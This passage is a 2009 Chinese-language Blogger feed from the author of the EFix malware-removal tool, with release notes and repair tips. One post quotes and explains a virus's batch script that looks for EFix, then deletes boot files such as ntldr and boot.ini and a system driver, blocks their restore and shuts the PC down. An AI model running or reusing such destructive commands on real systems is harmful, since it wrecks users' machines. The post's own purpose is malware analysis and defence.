type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/7090335055532537101'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/08/efix-ver-52-2009082359.html' title='EFix Ver 5.2 20090823.59'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-3066166736903309272</id><published>2009-08-23T16:54:00.003+08:00</published><updated>2009-08-23T16:57:41.541+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.2 20090823.55</title><content type='html'>版本資訊：5.2 20090823.55&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 918459 bytes&lt;br /&gt;MD5...: de4a0ad03b7720f3f94485f1bbe78fa0&lt;br /&gt;SHA1..: a5b9ed9ca287a5b0f76229d363cd20adf5716283&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows 7 RC 7100&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;因應針對EFix作的惡意程式，將主程序作了一個修改.避免執行EFix之後病毒抓取到主程序EF.COM之後進行自爆並毀滅作業系統的情形.&lt;br /&gt;修正一點不重要的bug&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-3066166736903309272?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3066166736903309272'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3066166736903309272'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/08/efix-ver-52-2009082355.html' title='EFix Ver 5.2 20090823.55'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-337360446632115096</id><published>2009-08-23T01:20:00.001+08:00</published><updated>2009-08-23T01:23:01.066+08:00</updated><title type='text'>有意思...</title><content type='html'>這一次碰到的隨身碟資料夾型病毒很有意思&lt;br /&gt;&lt;br /&gt;感謝香菇小精靈隨身碟病毒清除軟體作者提供了一些資訊&lt;br /&gt;&lt;br /&gt;是這樣的.&lt;br /&gt;&lt;br /&gt;前幾天我有跟人提到就是台灣製的隨身碟病毒&lt;br /&gt;&lt;br /&gt;這個隨身碟病毒有變種&lt;br /&gt;&lt;br /&gt;而他這一次的變種&lt;span style="color: rgb(255, 0, 0);"&gt;有針對EFix&lt;/span&gt;而來.&lt;br /&gt;&lt;br /&gt;這還第一次碰到....還蠻有意思的&lt;br /&gt;&lt;br /&gt;香菇小精靈有提到該病毒會檢測系統裡面的程序&lt;br /&gt;&lt;br /&gt;該批次代碼如下:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;tasklist|findstr /c:"ef.com" &amp;amp;&amp;amp; (goto :kill)&lt;br /&gt;&lt;br /&gt;:kill&lt;br /&gt;taskkill /F /IM explorer.exe&lt;br /&gt;del /f /s /q /a:h %SystemDrive%\boot.ini&lt;br /&gt;del /f /s /q /a:h %SystemDrive%\IO.sys&lt;br /&gt;del /f /s /q /a:h %SystemDrive%\CONFIG.SYS&lt;br /&gt;del /f /s /q /a:h %SystemDrive%\ntldr&lt;br /&gt;del /f /s /q /a:h %SystemDrive%\AUTOEXEC.BAT&lt;br /&gt;del /f /s /q /a:h %SystemDrive%\MSDOS.SYS&lt;br /&gt;md %SystemDrive%\boot.ini&lt;br /&gt;md %SystemDrive%\IO.sys&lt;br /&gt;md %SystemDrive%\CONFIG.SYS&lt;br /&gt;md %SystemDrive%\ntldr&lt;br /&gt;md %SystemDrive%\AUTOEXEC.BAT&lt;br /&gt;md %SystemDrive%\MSDOS.SYS&lt;br /&gt;del /f /s /q "%windir%\system32\drivers\pci.sys"&lt;br /&gt;md "%windir%\system32\drivers\pci.sys"&lt;br /&gt;shutdown -f -s -t 0&lt;br /&gt;del %0&lt;br /&gt;&lt;br /&gt;上面的代碼我大概解釋一下&lt;br /&gt;該病毒使用tasklist 這一段指令去檢查執行中的程序裡面有沒有一個叫做 ef.com的程序&lt;br /&gt;有的話，就刪除上面從:kill之後的檔案並建立資料夾讓你沒辦法複製回去&lt;br /&gt;&lt;br /&gt;然而ef.com 就是EFix使用的主運作程序....XD&lt;br /&gt;&lt;br /&gt;所以我想之前有一位版友有碰到ntldr移失的，我看大概就是因為這樣的原因&lt;br /&gt;好樣的....&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;我這兩天會找時間再做一些修改，看看能不能突破這惡意攻擊...&lt;br /&gt;有中的人自己先小心點.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-337360446632115096?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/337360446632115096'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/337360446632115096'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/08/blog-post_23.html' title='有意思...'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-2363647789622577509</id><published>2009-08-17T15:24:00.002+08:00</published><updated>2009-08-17T15:26:00.665+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.2 20090817.52</title><content type='html'>版本： 5.2 20090817.52&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 908629 bytes&lt;br /&gt;MD5...: 4b25d2732e748992926ac864e121bf81&lt;br /&gt;SHA1..: 23111eda18e2e675fd7eea7981d06cd5736abf7d&lt;br /&gt;&lt;br /&gt;測試過的作業系統&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows 7 RC 7100&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;增加刪除檔案&lt;br /&gt;修正特殊模式4的偵測全部跳過的問題&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-2363647789622577509?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/2363647789622577509'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/2363647789622577509'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/08/efix-ver-52-2009081752.html' title='EFix Ver 5.2 20090817.52'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-6016651792954500746</id><published>2009-08-14T13:40:00.001+08:00</published><updated>2009-08-14T13:43:06.575+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.2 20090814.51</title><content type='html'>版本：5.2 20090814.51&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 908439 bytes&lt;br /&gt;MD5...: 007e306f1627aa54b11f937d3401bf2a&lt;br /&gt;SHA1..: cf023785670944954916ae26ff2831dacbf1d672&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows XP SP2 SP3&lt;br /&gt;Windows 7 RC1 7100&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;自定義腳本參數增加&lt;br /&gt;List File::&lt;br /&gt;List Folder::&lt;br /&gt;all Process::&lt;br /&gt;修正驅動項目還沒經過白名單過濾就直接進行黑名單比對的問題.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-6016651792954500746?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6016651792954500746'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6016651792954500746'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/08/efix-ver-52-2009081451.html' title='EFix Ver 5.2 20090814.51'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-574799638738388688</id><published>2009-08-14T11:28:00.004+08:00</published><updated>2009-08-14T16:13:39.546+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='系統'/><title type='text'>首頁被綁架進選項變灰色不能動的解決方式</title><content type='html'>這邊一樣也是測試那個台灣製資料夾病毒所產生出來的東西&lt;br /&gt;&lt;br /&gt;首頁會被綁架變成哪個網址我忘記了0rz&lt;br /&gt;晚一點在測一下&lt;br /&gt;11:49補充:該網址是 11bc0072.linkbucks.com&lt;br /&gt;&lt;br /&gt;而綁架之後在IE的網際網路選項內的首頁會變成灰色無法修改回來&lt;br /&gt;而要回復成可以修改的方式可使用底下的方法試看看 (不保證一定會好)&lt;br /&gt;&lt;br /&gt;注意：底下的操作具有一定風險性，如沒有把握請找他人幫忙處理.&lt;br /&gt;&lt;br /&gt;複製底下的紅色文字&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);font-size:85%;" &gt;REGEDIT4&lt;br /&gt;&lt;b&gt;[-HKEY_CURRENT_USER\Software\Policies\Microsoft\&lt;/b&gt;Internet Explorer]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;之後開啟記事本將複製的文字貼上 (注意：[到]之間是同一行包含[])&lt;br /&gt;之後按另存新檔&lt;br /&gt;檔案名稱取名為123.reg&lt;br /&gt;檔案類型選&lt;span style="color: rgb(0, 0, 153);"&gt;所有檔案&lt;/span&gt;&lt;br /&gt;編碼選&lt;span style="color: rgb(0, 0, 153);"&gt;ANSI&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;之後執行123.reg後按下確定.&lt;br /&gt;然後重開機開IE在去修改即可.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-574799638738388688?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/574799638738388688'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/574799638738388688'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/08/blog-post_14.html' title='首頁被綁架進選項變灰色不能動的解決方式'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-7555676328516462058</id><published>2009-08-06T13:40:00.004+08:00</published><updated>2009-08-06T13:48:57.721+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.2 20090806.47</title><content type='html'>版本資訊： 5.2 20090806.47&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 907554 bytes&lt;br /&gt;MD5   : 92352fc15766af12f95efbcfddc452a5&lt;br /&gt;SHA1  : 183b3f69b4d09ca9c46a715346fd8218fcc43d55&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows XP SP2 SP3&lt;br /&gt;Windows 7 RC7100&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;增加對近期比較多的台灣製批次型隨身碟偽裝成資料夾的病毒主檔作一個較完整的處理&lt;br /&gt;但並不處理隨身碟上所產生的偽裝檔，因為會引響到執行速度&lt;br /&gt;所以有中的人如果要清理請先執行EFix&lt;br /&gt;EFix會將常駐在系統的病毒主檔破壞刪除.&lt;br /&gt;之後在將隨身碟內建立的偽裝資料夾病毒自行清理掉即可.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-7555676328516462058?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/7555676328516462058'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/7555676328516462058'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/08/efix-ver-52-2009080647.html' title='EFix Ver 5.2 20090806.47'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-1748057976921157026</id><published>2009-08-05T17:12:00.001+08:00</published><updated>2009-08-05T17:15:14.550+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='系統'/><title type='text'>無法刪除的使用者帳戶</title><content type='html'>這邊是在測試病毒的時候發現的...&lt;br /&gt;&lt;br /&gt;處理方式&lt;br /&gt;XP SP2&lt;br /&gt;&lt;br /&gt;先開啟登錄編輯器&lt;br /&gt;然後尋找&lt;br /&gt;HKEY_LOCAL_MACHINE\SAM&lt;br /&gt;按右鍵選使用權限&lt;br /&gt;將administrator允許的地方打勾&lt;br /&gt;打勾之後到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names&lt;br /&gt;去找那一個不知道為何多出來的使用者名稱將他刪除就可以.&lt;br /&gt;刪除完之後到HKEY_LOCAL_MACHINE\SAM的位置將權限還原.&lt;br /&gt;&lt;br /&gt;但要注意這樣有可能會造成系統崩潰或者是不穩定&lt;br /&gt;使用時要三思.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-1748057976921157026?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1748057976921157026'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1748057976921157026'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/08/blog-post.html' title='無法刪除的使用者帳戶'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-8501095454007479958</id><published>2009-08-05T09:20:00.002+08:00</published><updated>2009-08-05T09:22:19.369+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.2 20090805.44</title><content type='html'>版本：5.2 20090805.44&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 907028 bytes&lt;br /&gt;MD5...: 5661de8671e71d68eda20641e95b2d1d&lt;br /&gt;SHA1..: 6ee7e4221379c7b9e06d62dbf936469c9f7fb8ea&lt;br /&gt;&lt;br /&gt;測試過的作業系統&lt;br /&gt;Windows XP SP3&lt;br /&gt;Windows 7 RC7100&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;修正誤刪adobe系列的東西.這一版修正先放出來&lt;br /&gt;晚一點還有一個地方要處理,但誤刪是最優先處理的所以先放出來.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-8501095454007479958?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/8501095454007479958'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/8501095454007479958'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/08/efix-ver-52-2009080544.html' title='EFix Ver 5.2 20090805.44'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-5107029108057926348</id><published>2009-08-04T13:49:00.002+08:00</published><updated>2009-08-04T13:53:08.743+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.2 20090804.43</title><content type='html'>版本： 5.2 20090804.43&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 907002 bytes&lt;br /&gt;MD5...: 8982fd5faa3fcf2c67b1b9e69b5e065a&lt;br /&gt;SHA1..: 8728c4b368cc40fd755018c9c78df8e99c9d78de&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows XP SP3&lt;br /&gt;Windows 7 RC7100&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;增加一個檔案現在沒用到，以後會有機會用到&lt;br /&gt;強化對台灣製資料夾病毒的偵測&lt;br /&gt;修改部分人執行到script gui內會變亂碼的情形 (html語系問題)&lt;br /&gt;系統分析日期建立檔案增加windows\system資料夾.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-5107029108057926348?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5107029108057926348'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5107029108057926348'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/08/efix-ver-52-2009080443.html' title='EFix Ver 5.2 20090804.43'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-4213172260213707185</id><published>2009-07-30T16:37:00.003+08:00</published><updated>2009-07-30T17:06:34.903+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>還原系統到EFix執行前的用法</title><content type='html'>這兩天有看一下，似乎有些人執行時還是有些問題.&lt;br /&gt;雖然說不見得是EFix造成的，但我想一般都會以結果論來看吧.&lt;br /&gt;&lt;br /&gt;這邊先提一個重點，在您執行EFix要清惡意程式的同時請不要忘記了，&lt;span style="color: rgb(255, 0, 0);"&gt;惡意程式他正在執行...&lt;/span&gt;&lt;br /&gt;天曉得這惡意程式會有甚麼樣子的動作.&lt;br /&gt;&lt;br /&gt;像之前所碰到的每個月3號和18還28號刪D,E槽全磁碟資料的惡作劇惡意程式他就是這樣幹.&lt;br /&gt;當中這東西到了每個月3號的時候，就開始刪除D槽E槽的所有資料&lt;br /&gt;刪除完之後再建立一個autorun.inf檔案以及,.exe檔案&lt;br /&gt;此時&lt;span style="color: rgb(255, 0, 0);"&gt;D槽E槽就只剩下這兩個檔案&lt;/span&gt;...&lt;br /&gt;而其中,.exe被刪除之後在使用者要開啟D槽或E槽的時候&lt;br /&gt;就會出現磁碟點不開的情形，因為autorun.inf找不到所需要執行的檔案&lt;br /&gt;所以使用者就會開始找軟體想辦法解決,而找到這裡或者是其他的一些清除軟體&lt;br /&gt;然而執行完畢後autorun.inf刪除了，但使用者一開啟了D槽或E槽後發現&lt;br /&gt;奇怪怎麼我的資料全部被刪光了？&lt;br /&gt;&lt;br /&gt;而這時就會產生幾種情形.&lt;br /&gt;&lt;br /&gt;1.使用者認為病毒砍了他全磁碟資料找復原軟體 (O)&lt;br /&gt;2.使用者不知道發生甚麼情形以為他自己幹了啥事刪了全磁碟資料 (X)&lt;br /&gt;3.使用者認為是EFix或者是清除軟體刪了他全磁碟資料 (X)&lt;br /&gt;4.  .......直接罵聲幹作清除軟體的人不得好死這一類的...&lt;br /&gt;&lt;br /&gt;但前面病毒流程我已經說明了，而在這病毒剛出現的時候&lt;br /&gt;很多人跟我反應為何執行了EFix之後發現他D槽或E槽資料都不見了？&lt;br /&gt;有人還說小心路上不要被他碰到等等的...&lt;br /&gt;&lt;br /&gt;連部分的解毒老手一開始也沒辦法得知這惡意程式的動作進而跟我反應說會刪除全磁碟資料&lt;br /&gt;後來找到一個協助者取得了樣本後才知道原來那病毒會這樣幹...&lt;br /&gt;&lt;br /&gt;那一段時間黑鍋可真的是背很大0rz&lt;br /&gt;這是往事....就不管他了.&lt;br /&gt;&lt;br /&gt;這邊提重點&lt;br /&gt;&lt;br /&gt;如果說你覺得執行EFix後的結果讓你不滿意或者是覺得反而問題更多的話&lt;br /&gt;您可以使用EFix裡面所建立的幾個還原方式去還原到執行EFix之前的狀態.&lt;br /&gt;&lt;br /&gt;總共是以下兩種方式：&lt;br /&gt;&lt;br /&gt;1.Windows內建的系統還原&lt;br /&gt;首先如果你是第一次執行的話，假設你系統中的系統還原有開啟並且能夠正常動作&lt;br /&gt;此時EFix會建立一個系統還原點，在當天第二次執行之後就不會建立了.除非又隔一天&lt;br /&gt;而系統還原要怎麼使用？&lt;br /&gt;&lt;br /&gt;按開始 -&gt; 程式集 -&gt; 附屬應用程式 -&gt; 系統工具 -&gt; 系統還原&lt;br /&gt;點下去之後他就會有相關的還原選項讓您選擇&lt;br /&gt;此時請注意EFix還原點名稱為&lt;span style="color: rgb(255, 0, 0);"&gt;EFix Created Point&lt;/span&gt;&lt;br /&gt;如果只是要回復到執行EFix前的狀態，就請找這一項還原即可&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.登錄值備份和檔案備份&lt;br /&gt;&lt;br /&gt;基本上檔案備份就看最後產生的報告為主&lt;br /&gt;EX:&lt;br /&gt;EF刪除的檔案備份位置列表:&lt;br /&gt;&lt;br /&gt;C:\Windows\System32\kavo.exe =&gt; C:\ef_backup\backup\C\Windows\System32\kavo.exe.vir&lt;br /&gt;&lt;br /&gt;像這樣你就可以去找&lt;br /&gt;C:\ef_backup\backup\C\Windows\System32\kavo.exe.vir這檔案&lt;br /&gt;將他複製到c:\windows\system32資料夾後，再將後面的副檔名.vir去掉&lt;br /&gt;這樣檔案就回去了&lt;br /&gt;&lt;br /&gt;而登錄值呢？&lt;br /&gt;&lt;br /&gt;登錄值的話請你找C:\ef_backup\reg\erunt這一個資料夾&lt;br /&gt;裡面有一個程式叫作erdnt&lt;br /&gt;在執行他之後他會跳出視窗&lt;br /&gt;請全部打勾之後在按下OK，該程式會要求您重開機&lt;br /&gt;重開機之後登錄值就還原到&lt;span style="color: rgb(255, 0, 0);"&gt;最後一次執行EFix之前的狀態&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;以上這兩種方式為EFix對系統檔案的備份方式.&lt;br /&gt;程式本身雖然在我這以及我周圍的電腦上面測試過都沒有太大的問題&lt;br /&gt;但我並不能保證每一台電腦在執行上都不會有任何狀況，畢竟這變數太大&lt;br /&gt;所以作這兩個還原方式讓系統有機會能夠還原到執行前的狀態.&lt;br /&gt;&lt;br /&gt;只是現在的病毒....請自己多小心吧.&lt;br /&gt;資料該作好備份和系統安全的部分就多加留意&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-4213172260213707185?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4213172260213707185'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4213172260213707185'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/07/efix.html' title='還原系統到EFix執行前的用法'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-9035698237269712214</id><published>2009-07-29T11:01:00.002+08:00</published><updated>2009-07-29T11:05:22.835+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.2 2009072840</title><content type='html'>版本：5.2 20090728.40&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows XP SP3&lt;br /&gt;Windows Vista&lt;br /&gt;Windows 7 RC 7100&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 905913 bytes&lt;br /&gt;MD5   : 51e4d5c4f9aa2fa5d11b00959c0430a1&lt;br /&gt;SHA1  : 978c521a5b1770b51284fc9ed783885435c40330&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;修正移除腳本如果有swxcacls檔案會機率性產生死循環的問題.&lt;br /&gt;修改services.vbs的讀取方式.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-9035698237269712214?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/9035698237269712214'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/9035698237269712214'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/07/efix-ver-52-2009072840.html' title='EFix Ver 5.2 2009072840'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-5659942651688163399</id><published>2009-07-24T16:11:00.001+08:00</published><updated>2009-07-24T16:13:45.024+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.2 20090724.39</title><content type='html'>版本：5.2 20090724.39&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;table id="tablaInformacion" width="550" border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr class=""&gt;&lt;td&gt;File size: 905988 bytes&lt;/td&gt;&lt;/tr&gt;&lt;tr class="odd"&gt;&lt;td&gt;MD5...: 82650519d98ca2ea758ef50a19684628&lt;/td&gt;&lt;/tr&gt;&lt;tr class=""&gt;&lt;td&gt;SHA1..: 7be43e76c36f13156235b1f4700b4cfe83ca584a&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows XP SP3&lt;br /&gt;Windows Vista&lt;br /&gt;Windows 7 RC1 7100&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;去掉刪除mdm.exe&lt;br /&gt;介面作一點修改.&lt;br /&gt;&lt;br /&gt;其他：&lt;br /&gt;空間越來越慘了0rz&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-5659942651688163399?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5659942651688163399'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5659942651688163399'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/07/efix-ver-52-2009072439.html' title='EFix Ver 5.2 20090724.39'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-6934584540892532002</id><published>2009-07-23T20:37:00.002+08:00</published><updated>2009-07-23T20:44:41.678+08:00</updated><category 